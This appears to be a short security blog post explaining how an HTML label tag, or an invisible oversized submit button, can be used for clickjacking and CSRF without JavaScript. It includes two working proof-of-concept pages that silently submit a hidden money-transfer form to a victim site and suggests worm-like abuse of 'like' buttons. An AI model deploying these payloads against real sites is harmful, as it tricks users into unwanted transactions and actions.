label clickjacking and javascriptless csrf    Posted:


Another niche attack. I happened to notice the interesting behaviour of the <label> tag today while working on some web application development.

1 <label for="target">*STUFF*</label>

The for-attribute triggers a click event on the targeted element by id. It can trigger the click events on a bunch of different input-tags whenever anything between it's start and end tags are clicked. This is an intended behaviour, but it can be abused for clickjacking.

Here is a way to abuse it for submitting csrf forms.

labelcsrf.html

 1 <!DOCTYPE HTML>
 2 <html>
 3 <body>
 4         <label for="target_element" style="display: block; height: 13370px; width: 100%;">
 5         </label>
 6 
 7         <form method="post" action="http://victim" style="display: none;" >
 8                 <input type="text" name="moneys" value="all">
 9                 <input type="text" name="recipient" value="evul_haxxer">
10                 <input id="target_element" type="submit" name="send" value="Send moneys">
11         </form>
12 </body>

Of course, it's a bit redundant. The following snippet does the same thing without using the label tag at all.

invisbuttoncsrf.html

 1 <!DOCTYPE HTML>
 2 <html>
 3 <body>
 4         <form method="post" action="http://victim">
 5                 <input id="target_element" type="submit" name="send" value="Send moneys" style="display: block; height: 13370px; width: 100%; opacity: 0;">
 6                 <input type="text" name="moneys" value="all">
 7                 <input type="text" name="recipient" value="evul_haxxer">
 8         </form>
 9 </body>

I tested both of these in firefox with noscript and they pass.

But imagine a scenario where the HTML filtering is not quite as secure as it should be and the label-tag can be submitted. Then it could be abused to trigger clicks on the rendered site without the user's consent. Imagine a social media site with a "like"-functionality alá Facebook for example. Triggering a click on the like could make for some fun Samy-like worms.

Fortunately, most sites use whitelists for html user input these days.